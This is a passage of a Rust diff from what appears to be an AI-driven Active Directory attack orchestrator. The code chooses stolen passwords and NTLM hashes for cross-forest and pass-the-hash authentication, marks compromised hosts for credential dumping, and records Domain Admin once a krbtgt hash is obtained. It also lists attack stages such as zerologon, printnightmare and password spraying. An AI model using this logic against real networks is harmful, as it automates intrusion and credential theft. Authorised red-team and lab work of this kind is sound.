seen.insert(domain.clone()); + if let Some(ip) = self.resolve_dc_ip(&domain) { + result.push((domain, ip)); + } + } + + result + } + + /// Find a cleartext credential from a trusted domain that can authenticate + /// to `target_domain` via AD trust (child→parent or cross-forest). + /// + /// Used as a fallback when no same-domain cleartext credential exists. + /// Child-domain creds authenticate to parent DCs via the parent-child trust; + /// cross-forest creds authenticate via bidirectional forest trusts. + pub fn find_trust_credential( + &self, + target_domain: &str, + ) -> Option { + let target = target_domain.to_lowercase(); + + // Priority 1: child-domain cred → parent-domain (most reliable) + if let Some(c) = self.credentials.iter().find(|c| { + !c.password.is_empty() + && !self.is_credential_quarantined(&c.username, &c.domain) + && c.domain.to_lowercase().ends_with(&format!(".{target}")) + }) { + return Some(c.clone()); + } + + // Priority 2: cross-forest trusted domain cred (bidirectional trust) + // Check if any credential's domain has a trust with the target domain. + // Also falls back to discovered-domain heuristic: if both domains have + // known DCs in the same operation, they are likely in a trust relationship. + // LDAP bind will simply fail if there is no actual trust. + for cred in &self.credentials { + if cred.password.is_empty() + || self.is_credential_quarantined(&cred.username, &cred.domain) + { + continue; + } + let cred_dom = cred.domain.to_lowercase(); + if cred_dom == target { + continue; // same domain, not a trust fallback + } + let cred_forest = self.forest_root_of(&cred_dom); + let target_forest = self.forest_root_of(&target); + if cred_forest != target_forest { + // Explicit trust relationship known + if self.trusted_domains.contains_key(&target_forest) + || self.trusted_domains.contains_key(&cred_forest) + { + return Some(cred.clone()); + } + // Heuristic: both forests have DCs in this engagement — likely + // trust-related. LDAP bind will fail harmlessly if not. + let target_has_dc = self.domain_controllers.keys().any(|d| { + let d = d.to_lowercase(); + d == target_forest || self.forest_root_of(&d) == target_forest + }); + let cred_has_dc = self.domain_controllers.keys().any(|d| { + let d = d.to_lowercase(); + d == cred_forest || self.forest_root_of(&d) == cred_forest + }); + if target_has_dc && cred_has_dc { + return Some(cred.clone()); + } + } + } + + None + } + + /// Find a credential for the SOURCE user (the principal performing the + /// action), regardless of which TARGET domain the action is aimed at. + /// + /// Cross-forest ACL/MSSQL/ADCS exploitation has the source user living in + /// their own domain (e.g. `petyer.baelish@sevenkingdoms.local`) while a + /// vuln's `domain` field points at the target (e.g. `essos.local`). + /// Same-domain matching against the target therefore drops legitimate + /// cross-forest work. + /// + /// Selection priority: + /// 1. Cred whose domain matches the explicit `@domain` suffix of + /// `source_user`, if present. + /// 2. Cred whose domain == `target_domain` (same-domain case). + /// 3. Cred from a domain in a trust relationship with `target_domain` + /// (forest sibling, child↔parent, or trusted_domains entry). + /// 4. Any non-empty, non-quarantined cred with matching username. + pub fn find_source_credential( + &self, + source_user: &str, + target_domain: &str, + ) -> Option { + let (name, explicit_dom) = parse_principal(source_user); + let name_l = name.to_lowercase(); + let target_l = target_domain.to_lowercase(); + let target_forest = self.forest_root_of(&target_l); + + let usable = |c: &ares_core::models::Credential| -> bool { + !c.password.is_empty() + && !self.is_credential_quarantined(&c.username, &c.domain) + && c.username.to_lowercase() == name_l + }; + + if let Some(ref d) = explicit_dom { + if let Some(c) = self + .credentials + .iter() + .find(|c| usable(c) && c.domain.to_lowercase() == *d) + { + return Some(c.clone()); + } + } + + if let Some(c) = self + .credentials + .iter() + .find(|c| usable(c) && c.domain.to_lowercase() == target_l) + { + return Some(c.clone()); + } + + if let Some(c) = self.credentials.iter().find(|c| { + if !usable(c) { + return false; + } + let dom = c.domain.to_lowercase(); + if dom == target_l { + return false; + } + let cred_forest = self.forest_root_of(&dom); + cred_forest == target_forest + || self.trusted_domains.contains_key(&target_forest) + || self.trusted_domains.contains_key(&cred_forest) + }) { + return Some(c.clone()); + } + + self.credentials.iter().find(|c| usable(c)).cloned() + } + + /// NTLM-hash variant of [`find_source_credential`] with the same priority + /// order. Restricts to NTLM hashes (the only type usable for PTH). + pub fn find_source_hash( + &self, + source_user: &str, + target_domain: &str, + ) -> Option { + let (name, explicit_dom) = parse_principal(source_user); + let name_l = name.to_lowercase(); + let target_l = target_domain.to_lowercase(); + let target_forest = self.forest_root_of(&target_l); + + let usable = |h: &ares_core::models::Hash| -> bool { + !h.hash_value.is_empty() + && h.hash_type.eq_ignore_ascii_case("NTLM") + && !self.is_credential_quarantined(&h.username, &h.domain) + && h.username.to_lowercase() == name_l + }; + + if let Some(ref d) = explicit_dom { + if let Some(h) = self + .hashes + .iter() + .find(|h| usable(h) && h.domain.to_lowercase() == *d) + { + return Some(h.clone()); + } + } + + if let Some(h) = self + .hashes + .iter() + .find(|h| usable(h) && h.domain.to_lowercase() == target_l) + { + return Some(h.clone()); + } + + if let Some(h) = self.hashes.iter().find(|h| { + if !usable(h) { + return false; + } + let dom = h.domain.to_lowercase(); + if dom == target_l { + return false; + } + let cred_forest = self.forest_root_of(&dom); + cred_forest == target_forest + || self.trusted_domains.contains_key(&target_forest) + || self.trusted_domains.contains_key(&cred_forest) + }) { + return Some(h.clone()); + } + + self.hashes.iter().find(|h| usable(h)).cloned() + } + + /// Get the forest root for a domain. + /// If the domain is a child (e.g. `child.contoso.local`), the forest + /// root is the parent (e.g. `contoso.local`). Otherwise returns self. + pub fn forest_root_of(&self, domain: &str) -> String { + let d = domain.to_lowercase(); + // Check if this domain is a child of any known domain + for known in self.domains.iter() { + let k = known.to_lowercase(); + if d != k && d.ends_with(&format!(".{k}")) { + return k; + } + } + for known in self.domain_controllers.keys() { + let k = known.to_lowercase(); + if d != k && d.ends_with(&format!(".{k}")) { + return k; + } + } + d + } + /// Check if a dedup key exists in the named set. pub fn is_processed(&self, set_name: &str, key: &str) -> bool { self.dedup @@ -173,6 +459,34 @@ impl StateInner { .insert(key); } + /// Remove a key from the named dedup set so it can be retried. + pub fn unmark_processed(&mut self, set_name: &str, key: &str) { + if let Some(s) = self.dedup.get_mut(set_name) { + s.remove(key); + } + } + + /// Remove every key in `set_name` that starts with `prefix`. Returns the + /// removed keys so the caller can also drop them from the persisted store. + /// Used by trust automation to wake cross-forest fallback automations + /// (FSP/ACL/group enum) for a target domain when their dedup format is + /// `{kind}:{domain}[:tail]` — clearing all entries for a target without + /// knowing the full key. + pub fn unmark_processed_by_prefix(&mut self, set_name: &str, prefix: &str) -> Vec { + let Some(s) = self.dedup.get_mut(set_name) else { + return Vec::new(); + }; + let to_remove: Vec = s + .iter() + .filter(|k| k.starts_with(prefix)) + .cloned() + .collect(); + for k in &to_remove { + s.remove(k); + } + to_remove + } + /// Check if all discovered forests have been dominated (krbtgt obtained). /// /// Returns `true` when `compute_undominated_forests()` returns an empty list, @@ -194,6 +508,16 @@ impl StateInner { } } +/// Parse a principal string of form `name` or `name@domain.fqdn`. +/// Returns `(name, Some(domain_lower))` for the @-form, `(name, None)` for bare names. +fn parse_principal(s: &str) -> (&str, Option) { + if let Some((name, dom)) = s.split_once('@') { + (name, Some(dom.to_lowercase())) + } else { + (s, None) + } +} + #[cfg(test)] mod tests { use super::*; @@ -246,6 +570,29 @@ mod tests { assert_eq!(state.dedup[DEDUP_SECRETSDUMP].len(), 1); } + #[test] + fn unmark_processed_by_prefix_removes_matching() { + let mut state = StateInner::new("op-1".into()); + state.mark_processed(DEDUP_SECRETSDUMP, "xforest:fabrikam.local:dc01".into()); + state.mark_processed(DEDUP_SECRETSDUMP, "xforest:fabrikam.local:dc02".into()); + state.mark_processed(DEDUP_SECRETSDUMP, "xforest:contoso.local:dc01".into()); + state.mark_processed(DEDUP_SECRETSDUMP, "unrelated:key".into()); + let removed = + state.unmark_processed_by_prefix(DEDUP_SECRETSDUMP, "xforest:fabrikam.local:"); + assert_eq!(removed.len(), 2); + assert!(removed + .iter() + .all(|k| k.starts_with("xforest:fabrikam.local:"))); + assert_eq!(state.dedup[DEDUP_SECRETSDUMP].len(), 2); + } + + #[test] + fn unmark_processed_by_prefix_unknown_set_returns_empty() { + let mut state = StateInner::new("op-1".into()); + let removed = state.unmark_processed_by_prefix("does_not_exist", "x:"); + assert!(removed.is_empty()); + } + #[test] fn dedup_sets_are_independent() { let mut state = StateInner::new("op-1".into()); @@ -331,6 +678,40 @@ mod tests { DEDUP_ADCS_EXPLOIT, DEDUP_GPO_ABUSE, DEDUP_LAPS, + DEDUP_NTLM_RELAY, + DEDUP_NOPAC, + DEDUP_ZEROLOGON, + DEDUP_PRINTNIGHTMARE, + DEDUP_MSSQL_COERCION, + DEDUP_PASSWORD_POLICY, + DEDUP_GPP_SYSVOL, + DEDUP_NTLMV1_DOWNGRADE, + DEDUP_LDAP_SIGNING, + DEDUP_WEBDAV_DETECTION, + DEDUP_SPOOLER_CHECK, + DEDUP_MACHINE_ACCOUNT_QUOTA, + DEDUP_DFS_COERCION, + DEDUP_PETITPOTAM_UNAUTH, + DEDUP_WINRM_LATERAL, + DEDUP_GROUP_ENUMERATION, + DEDUP_LOCALUSER_SPRAY, + DEDUP_KRBRELAYUP, + DEDUP_SEARCHCONNECTOR, + DEDUP_LSASSY_DUMP, + DEDUP_RDP_LATERAL, + DEDUP_FOREIGN_GROUP_ENUM, + DEDUP_CERTIPY_AUTH, + DEDUP_SID_ENUMERATION, + DEDUP_DNS_ENUM, + DEDUP_DOMAIN_USER_ENUM, + DEDUP_PTH_SPRAY, + DEDUP_CERTIFRIED, + DEDUP_DACL_ABUSE, + DEDUP_SMBCLIENT_ENUM, + DEDUP_ACL_DISCOVERY, + DEDUP_CROSS_FOREST_ENUM, + DEDUP_CROSS_REALM_LATERAL, + DEDUP_GOLDEN_CERT, ]; assert_eq!(expected.len(), ALL_DEDUP_SETS.len()); for name in expected { diff --git a/ares-cli/src/orchestrator/state/mod.rs b/ares-cli/src/orchestrator/state/mod.rs index 93b8002d..35483899 100644 --- a/ares-cli/src/orchestrator/state/mod.rs +++ b/ares-cli/src/orchestrator/state/mod.rs @@ -14,6 +14,7 @@ mod publishing; mod shared; // Re-export everything that was publicly visible from the old single file. +pub use inner::StateInner; pub use shared::SharedState; pub const DEDUP_CRACK_REQUESTS: &str = "crack_requests"; @@ -41,6 +42,40 @@ pub const DEDUP_SHARE_ENUM: &str = "share_enum"; pub const DEDUP_ADCS_EXPLOIT: &str = "adcs_exploit"; pub const DEDUP_GPO_ABUSE: &str = "gpo_abuse"; pub const DEDUP_LAPS: &str = "laps_extract"; +pub const DEDUP_NTLM_RELAY: &str = "ntlm_relay"; +pub const DEDUP_NOPAC: &str = "nopac"; +pub const DEDUP_ZEROLOGON: &str = "zerologon"; +pub const DEDUP_PRINTNIGHTMARE: &str = "printnightmare"; +pub const DEDUP_MSSQL_COERCION: &str = "mssql_coercion"; +pub const DEDUP_PASSWORD_POLICY: &str = "password_policy"; +pub const DEDUP_GPP_SYSVOL: &str = "gpp_sysvol"; +pub const DEDUP_NTLMV1_DOWNGRADE: &str = "ntlmv1_downgrade"; +pub const DEDUP_LDAP_SIGNING: &str = "ldap_signing"; +pub const DEDUP_WEBDAV_DETECTION: &str = "webdav_detection"; +pub const DEDUP_SPOOLER_CHECK: &str = "spooler_check"; +pub const DEDUP_MACHINE_ACCOUNT_QUOTA: &str = "machine_account_quota"; +pub const DEDUP_DFS_COERCION: &str = "dfs_coercion"; +pub const DEDUP_PETITPOTAM_UNAUTH: &str = "petitpotam_unauth"; +pub const DEDUP_WINRM_LATERAL: &str = "winrm_lateral"; +pub const DEDUP_GROUP_ENUMERATION: &str = "group_enumeration"; +pub const DEDUP_LOCALUSER_SPRAY: &str = "localuser_spray"; +pub const DEDUP_KRBRELAYUP: &str = "krbrelayup"; +pub const DEDUP_SEARCHCONNECTOR: &str = "searchconnector"; +pub const DEDUP_LSASSY_DUMP: &str = "lsassy_dump"; +pub const DEDUP_RDP_LATERAL: &str = "rdp_lateral"; +pub const DEDUP_FOREIGN_GROUP_ENUM: &str = "foreign_group_enum"; +pub const DEDUP_CERTIPY_AUTH: &str = "certipy_auth"; +pub const DEDUP_SID_ENUMERATION: &str = "sid_enumeration"; +pub const DEDUP_DNS_ENUM: &str = "dns_enum"; +pub const DEDUP_DOMAIN_USER_ENUM: &str = "domain_user_enum"; +pub const DEDUP_PTH_SPRAY: &str = "pth_spray"; +pub const DEDUP_CERTIFRIED: &str = "certifried"; +pub const DEDUP_DACL_ABUSE: &str = "dacl_abuse"; +pub const DEDUP_SMBCLIENT_ENUM: &str = "smbclient_enum"; +pub const DEDUP_ACL_DISCOVERY: &str = "acl_discovery"; +pub const DEDUP_CROSS_FOREST_ENUM: &str = "cross_forest_enum"; +pub const DEDUP_CROSS_REALM_LATERAL: &str = "cross_realm_lateral"; +pub const DEDUP_GOLDEN_CERT: &str = "golden_cert"; /// Vuln queue ZSET key suffix. pub const KEY_VULN_QUEUE: &str = "vuln_queue"; @@ -74,4 +109,103 @@ const ALL_DEDUP_SETS: &[&str] = &[ DEDUP_ADCS_EXPLOIT, DEDUP_GPO_ABUSE, DEDUP_LAPS, + DEDUP_NTLM_RELAY, + DEDUP_NOPAC, + DEDUP_ZEROLOGON, + DEDUP_PRINTNIGHTMARE, + DEDUP_MSSQL_COERCION, + DEDUP_PASSWORD_POLICY, + DEDUP_GPP_SYSVOL, + DEDUP_NTLMV1_DOWNGRADE, + DEDUP_LDAP_SIGNING, + DEDUP_WEBDAV_DETECTION, + DEDUP_SPOOLER_CHECK, + DEDUP_MACHINE_ACCOUNT_QUOTA, + DEDUP_DFS_COERCION, + DEDUP_PETITPOTAM_UNAUTH, + DEDUP_WINRM_LATERAL, + DEDUP_GROUP_ENUMERATION, + DEDUP_LOCALUSER_SPRAY, + DEDUP_KRBRELAYUP, + DEDUP_SEARCHCONNECTOR, + DEDUP_LSASSY_DUMP, + DEDUP_RDP_LATERAL, + DEDUP_FOREIGN_GROUP_ENUM, + DEDUP_CERTIPY_AUTH, + DEDUP_SID_ENUMERATION, + DEDUP_DNS_ENUM, + DEDUP_DOMAIN_USER_ENUM, + DEDUP_PTH_SPRAY, + DEDUP_CERTIFRIED, + DEDUP_DACL_ABUSE, + DEDUP_SMBCLIENT_ENUM, + DEDUP_ACL_DISCOVERY, + DEDUP_CROSS_FOREST_ENUM, + DEDUP_CROSS_REALM_LATERAL, + DEDUP_GOLDEN_CERT, ]; + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn all_dedup_sets_are_unique() { + let mut seen = std::collections::HashSet::new(); + for name in ALL_DEDUP_SETS { + assert!(seen.insert(*name), "Duplicate dedup set name: {name}"); + } + } + + #[test] + fn new_dedup_constants_in_all_dedup_sets() { + let new_constants = [ + DEDUP_NTLM_RELAY, + DEDUP_NOPAC, + DEDUP_ZEROLOGON, + DEDUP_PRINTNIGHTMARE, + DEDUP_MSSQL_COERCION, + DEDUP_PASSWORD_POLICY, + DEDUP_GPP_SYSVOL, + DEDUP_NTLMV1_DOWNGRADE, + DEDUP_LDAP_SIGNING, + DEDUP_WEBDAV_DETECTION, + DEDUP_SPOOLER_CHECK, + DEDUP_MACHINE_ACCOUNT_QUOTA, + DEDUP_DFS_COERCION, + DEDUP_PETITPOTAM_UNAUTH, + DEDUP_WINRM_LATERAL, + DEDUP_GROUP_ENUMERATION, + DEDUP_LOCALUSER_SPRAY, + DEDUP_KRBRELAYUP, + DEDUP_SEARCHCONNECTOR, + DEDUP_LSASSY_DUMP, + DEDUP_RDP_LATERAL, + DEDUP_FOREIGN_GROUP_ENUM, + DEDUP_CERTIPY_AUTH, + DEDUP_SID_ENUMERATION, + DEDUP_DNS_ENUM, + DEDUP_DOMAIN_USER_ENUM, + DEDUP_PTH_SPRAY, + DEDUP_CERTIFRIED, + DEDUP_DACL_ABUSE, + DEDUP_SMBCLIENT_ENUM, + ]; + for c in &new_constants { + assert!( + ALL_DEDUP_SETS.contains(c), + "Dedup constant '{c}' missing from ALL_DEDUP_SETS" + ); + } + } + + #[test] + fn dedup_set_count() { + // Ensure we know how many dedup sets exist (catches accidental omissions) + assert!( + ALL_DEDUP_SETS.len() >= 45, + "Expected at least 45 dedup sets, got {}", + ALL_DEDUP_SETS.len() + ); + } +} diff --git a/ares-cli/src/orchestrator/state/publishing/credentials.rs b/ares-cli/src/orchestrator/state/publishing/credentials.rs index 5232af9f..ae918e90 100644 --- a/ares-cli/src/orchestrator/state/publishing/credentials.rs +++ b/ares-cli/src/orchestrator/state/publishing/credentials.rs @@ -10,15 +10,18 @@ use redis::aio::ConnectionLike; use crate::orchestrator::state::SharedState; use crate::orchestrator::task_queue::TaskQueueCore; -use super::sanitize_credential; +use super::{sanitize_credential, strip_netexec_artifact}; impl SharedState { /// Add a credential to state and Redis (with dedup). /// /// Sanitizes the credential before storage (strips "Password:" prefix, trailing - /// metadata, normalizes domains, rejects noise). When the credential's domain is - /// a valid FQDN (contains a dot), it is automatically added to `state.domains` - /// (matches Python's `add_credential()` behavior). + /// metadata, normalizes domains, rejects noise). The credential's `domain` + /// field is stored as-is on the credential, but is NEVER promoted into the + /// canonical `state.domains` registry — that registry is reserved for + /// authoritative recon (LDAP root DSE, DC enumeration, trust queries) so an + /// LLM-supplied typo like `north.sevenkingdomain.com` cannot pollute the + /// global view. pub async fn publish_credential( &self, queue: &TaskQueueCore, @@ -38,37 +41,33 @@ impl SharedState { let state = self.inner.read().await; state.operation_id.clone() }; - let reader = RedisStateReader::new(operation_id.clone()); + let reader = RedisStateReader::new(operation_id); let mut conn = queue.connection(); let added = reader.add_credential(&mut conn, &cred).await?; if added { - // Auto-extract domain from credential (matches Python add_credential) - let cred_domain = cred.domain.to_lowercase(); - if cred_domain.contains('.') { - let mut state = self.inner.write().await; - if !state.domains.contains(&cred_domain) { - state.domains.push(cred_domain.clone()); - let domain_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_DOMAINS, - ); - let _: Result<(), _> = - redis::AsyncCommands::sadd(&mut conn, &domain_key, &cred_domain).await; - let _: Result<(), _> = - redis::AsyncCommands::expire(&mut conn, &domain_key, 86400i64).await; - tracing::info!( - domain = %cred_domain, - username = %cred.username, - "Auto-extracted domain from credential" - ); - } - state.credentials.push(cred); - } else { - let mut state = self.inner.write().await; - state.credentials.push(cred); + // Warn (don't promote) when the credential's domain is unknown — this + // is how we surface LLM hallucinations without letting them mutate + // canonical state. Use NetExec-artifact-stripped form for the check. + let cred_domain = strip_netexec_artifact(&cred.domain.to_lowercase()).to_string(); + let mut state = self.inner.write().await; + if cred_domain.contains('.') + && !state + .domains + .iter() + .any(|d| d.eq_ignore_ascii_case(&cred_domain)) + && !state + .domain_controllers + .keys() + .any(|d| d.eq_ignore_ascii_case(&cred_domain)) + { + tracing::warn!( + domain = %cred_domain, + username = %cred.username, + source = %cred.source, + "Credential references unknown domain — not promoting to state.domains (authoritative recon required)" + ); } + state.credentials.push(cred); } Ok(added) } @@ -115,7 +114,8 @@ impl SharedState { // First pass: find a sibling whose domain matches a known DC let from_dc = state.hashes.iter().find_map(|h| { if h.parent_id.as_deref() == Some(pid) && !h.domain.is_empty() { - let d = h.domain.to_lowercase(); + let d = strip_netexec_artifact(&h.domain.to_lowercase()) + .to_string(); if state.domain_controllers.contains_key(&d) { return Some(d); } @@ -126,7 +126,10 @@ impl SharedState { from_dc.or_else(|| { state.hashes.iter().find_map(|h| { if h.parent_id.as_deref() == Some(pid) && !h.domain.is_empty() { - Some(h.domain.to_lowercase()) + Some( + strip_netexec_artifact(&h.domain.to_lowercase()) + .to_string(), + ) } else { None } @@ -135,7 +138,7 @@ impl SharedState { }) .unwrap_or_default() } else { - hash_domain.to_lowercase() + strip_netexec_artifact(&hash_domain.to_lowercase()).to_string() }; // Only mark as dominated if the domain is a known DC domain. // This prevents false domination claims from misattributed hashes @@ -164,14 +167,33 @@ impl SharedState { // Auto-set domain admin when first krbtgt NTLM hash arrives (matches Python) if !state.has_domain_admin { + let da_domain = krbtgt_domain.clone(); drop(state); let path = Some("secretsdump → krbtgt NTLM hash".to_string()); - if let Err(e) = self.set_domain_admin(queue, path).await { + if let Err(e) = self.set_domain_admin(queue, path.clone()).await { tracing::warn!(err = %e, "Failed to auto-set domain admin from krbtgt hash"); } else { tracing::info!( "🎯 Domain Admin auto-set from krbtgt NTLM hash in publish_hash" ); + // Emit DA timeline event + let techniques = vec!["T1003.006".to_string(), "T1078.002".to_string()]; + let event_id = + format!("evt-da-{}", &uuid::Uuid::new_v4().simple().to_string()[..8]); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "domain_admin", + "description": format!( + "CRITICAL: Domain Admin achieved for {} via {}", + da_domain, + path.as_deref().unwrap_or("krbtgt hash") + ), + "mitre_techniques": techniques, + }); + let _ = self + .persist_timeline_event(queue, &event, &techniques) + .await; } } else { drop(state); @@ -343,15 +365,23 @@ mod tests { } #[tokio::test] - async fn publish_credential_auto_extracts_domain() { + async fn publish_credential_does_not_pollute_state_domains() { + // LLM-supplied domains must never be promoted into the canonical + // `state.domains` registry — otherwise a typo like + // `north.sevenkingdomain.com` corrupts every downstream tick loop. let state = SharedState::new("op-1".to_string()); let q = mock_queue(); - let cred = make_cred("alice", "P@ssw0rd!", "contoso.local"); + let cred = make_cred("alice", "P@ssw0rd!", "north.sevenkingdomain.com"); state.publish_credential(&q, cred).await.unwrap(); let s = state.inner.read().await; - assert!(s.domains.contains(&"contoso.local".to_string())); + assert!( + s.domains.is_empty(), + "state.domains must remain untouched by credential ingestion, got {:?}", + s.domains + ); + assert_eq!(s.credentials.len(), 1); } #[tokio::test] diff --git a/ares-cli/src/orchestrator/state/publishing/hosts.rs b/ares-cli/src/orchestrator/state/publishing/hosts.rs index a3923601..bda00427 100644 --- a/ares-cli/src/orchestrator/state/publishing/hosts.rs +++ b/ares-cli/src/orchestrator/state/publishing/hosts.rs @@ -11,7 +11,7 @@ use redis::aio::ConnectionLike; use crate::orchestrator::state::SharedState; use crate::orchestrator::task_queue::TaskQueueCore; -use super::is_aws_hostname; +use super::{is_aws_hostname, strip_netexec_artifact}; impl SharedState { /// Add a host to state and Redis. @@ -29,9 +29,11 @@ impl SharedState { queue: &TaskQueueCore, host: Host, ) -> Result { - // Normalize hostname: strip trailing dots and AWS internal names + // Normalize hostname: strip trailing artifacts and AWS internal names. + // NetExec sometimes appends "0." to domain names (e.g. + // "dc01.contoso.local0." → "dc01.contoso.local"). Strip both forms. let mut host = host; - host.hostname = host.hostname.trim_end_matches('.').to_lowercase(); + host.hostname = strip_netexec_artifact(&host.hostname).to_lowercase(); if is_aws_hostname(&host.hostname) { host.hostname = String::new(); } @@ -102,7 +104,7 @@ impl SharedState { } let new_is_dc = host.is_dc || host.detect_dc(); let was_dc = existing.is_dc; - let had_hostname = !existing.hostname.is_empty(); + let had_fqdn = existing.hostname.contains('.'); let mut changed = false; if new_is_dc && !existing.is_dc { @@ -114,7 +116,17 @@ impl SharedState { existing.hostname = String::new(); changed = true; } - if !host.hostname.is_empty() && existing.hostname.is_empty() { + // Upgrade short name to FQDN when a better hostname arrives. + // Without this, the short name (e.g. "kingslanding") sticks + // and `register_dc` can't derive a domain from it, which + // forces the ambiguous fallback path and mis-maps DCs. + let upgrade_to_fqdn = host.hostname.contains('.') + && !existing.hostname.contains('.') + && host + .hostname + .to_lowercase() + .starts_with(&format!("{}.", existing.hostname.to_lowercase())); + if (!host.hostname.is_empty() && existing.hostname.is_empty()) || upgrade_to_fqdn { existing.hostname = host.hostname.clone(); changed = true; } @@ -138,11 +150,11 @@ impl SharedState { } // Re-register DC if it just became a DC, or if its hostname - // was just filled in (so we can correct the domain mapping). + // was upgraded to (or first set to) an FQDN — that's when we + // can finally derive the correct domain instead of guessing. let is_dc_now = existing.is_dc; - let has_hostname_now = !existing.hostname.is_empty(); - let needs_dc = - (is_dc_now && !was_dc) || (is_dc_now && has_hostname_now && !had_hostname); + let has_fqdn_now = existing.hostname.contains('.'); + let needs_dc = (is_dc_now && !was_dc) || (is_dc_now && has_fqdn_now && !had_fqdn); (needs_dc, true) } else { // No existing host — will be added below @@ -266,14 +278,23 @@ impl SharedState { }; // If we can't derive a domain from the hostname, fall back to the - // target domain already in state. This unblocks automation for DCs - // discovered before their FQDN is resolved. + // sole known domain. This unblocks automation for DCs discovered + // before their FQDN is resolved. + // + // Only fall back when exactly one domain is in state. With ≥2 + // domains, "first" is a guess that mis-maps DCs to the wrong domain + // (e.g. registering a parent DC under the child domain), and that + // bad mapping survives later cleanup — `register_dc` only purges + // stale entries by IP, so a subsequent correct registration with a + // *different* IP can't dislodge the wrong (domain, ip) pair. Skip + // and let the next FQDN-bearing discovery populate the entry. let raw_domain = if raw_domain.is_empty() || raw_domain.contains("compute.internal") || raw_domain.contains("amazonaws.com") { let state = self.inner.read().await; - if let Some(fallback) = state.domains.first().cloned() { + if state.domains.len() == 1 { + let fallback = state.domains[0].clone(); tracing::info!( ip = %host.ip, hostname = %host.hostname, @@ -285,7 +306,8 @@ impl SharedState { tracing::debug!( ip = %host.ip, hostname = %host.hostname, - "Skipping DC registration: no FQDN and no fallback domain in state" + known_domains = state.domains.len(), + "Skipping DC registration: no FQDN and ambiguous fallback domain" ); return Ok(()); } @@ -351,6 +373,74 @@ impl SharedState { Ok(()) } + + /// Mark a host as owned (admin access confirmed). + /// + /// This persists the owned flag to both in-memory state and Redis so + /// that automations like `auto_lsassy_dump` and `credential_expansion` + /// can react to host ownership changes. + pub async fn mark_host_owned( + &self, + queue: &TaskQueueCore, + ip: &str, + ) -> Result<()> { + let (host_json, op_id) = { + let mut state = self.inner.write().await; + let host = state.hosts.iter_mut().find(|h| h.ip == ip); + if let Some(h) = host { + if h.owned { + return Ok(()); // already owned + } + h.owned = true; + tracing::info!(ip = %ip, hostname = %h.hostname, "Host marked as owned"); + let json = serde_json::to_string(h).unwrap_or_default(); + (json, state.operation_id.clone()) + } else { + // Host not yet in state — create a minimal entry so downstream + // automations (lsassy_dump, credential_expansion) can fire. + // This happens when secretsdump succeeds before host discovery. + let new_host = Host { + ip: ip.to_string(), + hostname: ip.to_string(), // will be enriched by later discovery + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: state.domain_controllers.values().any(|dc| dc == ip), + owned: true, + }; + tracing::info!(ip = %ip, "Host not in state — creating owned entry"); + let json = serde_json::to_string(&new_host).unwrap_or_default(); + let op_id = state.operation_id.clone(); + state.hosts.push(new_host); + (json, op_id) + } + }; + + // Persist to Redis + let host_key = format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_HOSTS); + let mut conn = queue.connection(); + let entries: Vec = redis::AsyncCommands::lrange(&mut conn, &host_key, 0, -1) + .await + .unwrap_or_default(); + let mut found = false; + for (idx, entry) in entries.iter().enumerate() { + if let Ok(existing) = serde_json::from_str::(entry) { + if existing.ip == ip { + let _: Result<(), _> = + redis::AsyncCommands::lset(&mut conn, &host_key, idx as isize, &host_json) + .await; + found = true; + break; + } + } + } + if !found { + // New host entry — append to Redis list + let _: Result<(), _> = + redis::AsyncCommands::rpush(&mut conn, &host_key, &host_json).await; + } + Ok(()) + } } #[cfg(test)] @@ -608,6 +698,31 @@ mod tests { ); } + #[tokio::test] + async fn register_dc_skips_ambiguous_fallback_with_multiple_domains() { + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + // Two domains in state — fallback would be a guess. + { + let mut s = state.inner.write().await; + s.domains.push("contoso.local".to_string()); + s.domains.push("fabrikam.local".to_string()); + } + + // DC discovered with no FQDN — must NOT pick the first domain, + // because that would mis-map (e.g. parent DC under child domain) + // and the bad mapping survives later cleanup. + let host = make_host("192.168.58.1", "", true); + state.register_dc(&q, &host).await.unwrap(); + + let s = state.inner.read().await; + assert!( + s.domain_controllers.is_empty(), + "must skip registration when fallback domain is ambiguous" + ); + } + #[tokio::test] async fn register_dc_three_part_hostname_extracts_full_domain() { // Sanity check the >=3 parts branch with a deeper FQDN to make sure @@ -625,6 +740,46 @@ mod tests { ); } + #[tokio::test] + async fn publish_host_upgrades_short_hostname_to_fqdn_and_reregisters_dc() { + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + // Pre-populate two domains so the ambiguous fallback would fire + // if FQDN derivation didn't work. + { + let mut s = state.inner.write().await; + s.domains.push("contoso.local".to_string()); + s.domains.push("fabrikam.local".to_string()); + } + + // First sighting: short name only — register_dc must skip (ambiguous). + let h1 = make_host("192.168.58.1", "dc01", true); + state.publish_host(&q, h1).await.unwrap(); + { + let s = state.inner.read().await; + assert!(s.domain_controllers.is_empty()); + assert_eq!(s.hosts[0].hostname, "dc01"); + } + + // Second sighting: FQDN. Must upgrade hostname AND trigger + // re-registration so the DC lands under the correct domain. + let h2 = make_host("192.168.58.1", "dc01.fabrikam.local", true); + state.publish_host(&q, h2).await.unwrap(); + + let s = state.inner.read().await; + assert_eq!(s.hosts[0].hostname, "dc01.fabrikam.local"); + assert_eq!( + s.domain_controllers.get("fabrikam.local"), + Some(&"192.168.58.1".to_string()), + "DC must register under the domain derived from the upgraded FQDN" + ); + assert!( + !s.domain_controllers.contains_key("contoso.local"), + "must not also register under the wrong (first) domain" + ); + } + #[tokio::test] async fn publish_host_strips_trailing_dot() { let state = SharedState::new("op-1".to_string()); diff --git a/ares-cli/src/orchestrator/state/publishing/mod.rs b/ares-cli/src/orchestrator/state/publishing/mod.rs index 6cba8604..9e653c48 100644 --- a/ares-cli/src/orchestrator/state/publishing/mod.rs +++ b/ares-cli/src/orchestrator/state/publishing/mod.rs @@ -111,6 +111,23 @@ pub(super) fn sanitize_credential( Some(cred) } +/// Strip the trailing "0." artifact that NetExec sometimes appends to domain +/// names (e.g. `dc01.contoso.local0.` → `dc01.contoso.local`, +/// `contoso.local0` → `contoso.local`). +pub(super) fn strip_netexec_artifact(s: &str) -> &str { + let s = s.trim_end_matches('.'); + // "0." already collapsed to "0" after trimming "."; strip if preceded by a label + match s.strip_suffix("0.") { + Some(clean) => clean.trim_end_matches('.'), + None => match s.strip_suffix('0') { + // Avoid stripping a real trailing 